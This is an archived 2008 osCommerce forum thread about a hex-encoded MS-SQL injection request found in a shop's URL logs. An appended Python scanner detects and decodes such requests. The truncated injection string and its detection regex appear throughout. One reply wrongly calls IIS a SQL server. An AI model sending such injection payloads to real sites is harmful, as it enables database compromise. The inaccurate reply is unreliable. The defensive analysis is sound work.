Brian-Bear
Posted October 13, 2008

I have seen this in my last urls list and looks a bit nasty. What are they trying to do?

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742061

Any ideas?

Guest
Posted October 13, 2008

I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam.

failsafe
Posted October 13, 2008

> I have seen this in my last urls list and looks a bit nasty. What are they trying to do?
> product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292...
> any ideas

Well, it appears to be an IIS / MS-SQL injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using MySQL for osCommerce (and not MS-SQL) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :)

If you put "CHAR(4000) injection attack" into Google you can find out about it.

php_Guy
Posted October 14, 2008

Install the Security Mods and they won't be able to attempt that sort of attack any longer.

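
Added example, not part of any post in this thread: a small log scanner that finds requests of the `DECLARE @S CHAR(4000);SET @S=CAST(0x...` shape quoted in the first post and decodes the hex blob so the SQL it carries can be read. The function names, the sample log lines and the client addresses are constructed for illustration; accepting `NVARCHAR`/`VARCHAR` declarations and UTF-16 payloads goes beyond the request shown here and is an assumption about variants.

```python
import re
from urllib.parse import unquote

# DECLARE @S CHAR(4000);SET @S=CAST(0x<hex> ... as seen in the request above.
# NVARCHAR/VARCHAR are accepted too (assumption: variants differ only in type).
CAST_HEX = re.compile(
    r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\s*\(\d+\)\s*;\s*"
    r"SET\s+@\w+\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)",
    re.IGNORECASE,
)

def decode_cast_payload(request):
    """Return the SQL text carried in the CAST(0x...) blob, or None."""
    m = CAST_HEX.search(unquote(request))
    if m is None:
        return None
    digits = m.group(1)
    digits = digits[: len(digits) - len(digits) % 2]  # logs may truncate mid-byte
    raw = bytes.fromhex(digits)
    if b"\x00" in raw:  # wide-character payload: UTF-16LE
        return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def scan(log_lines):
    """Return (line_number, decoded_sql) for every line carrying the pattern."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        sql = decode_cast_payload(line)
        if sql is not None:
            hits.append((n, sql))
    return hits

# Constructed sample log: the request is the one from the thread (truncated
# there as well); addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Oct/2008:10:00:00 +0000] "GET /product_info.php?products_id=1649;'
    'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    '4445434C415245204054207661726368617228323535292C40432076617263686172'
    '283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073'
    '656C6563742061 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [13/Oct/2008:10:00:05 +0000] "GET /product_info.php?products_id=1649 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for n, sql in scan(SAMPLE_LOG):
        print(f"line {n}: {sql}")
```

The decoded text is T-SQL (a `DECLARE ... CURSOR FOR select` statement), which shows from the logs alone that the request targets Microsoft SQL Server syntax.
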
This topic is now archived and is closed to further replies.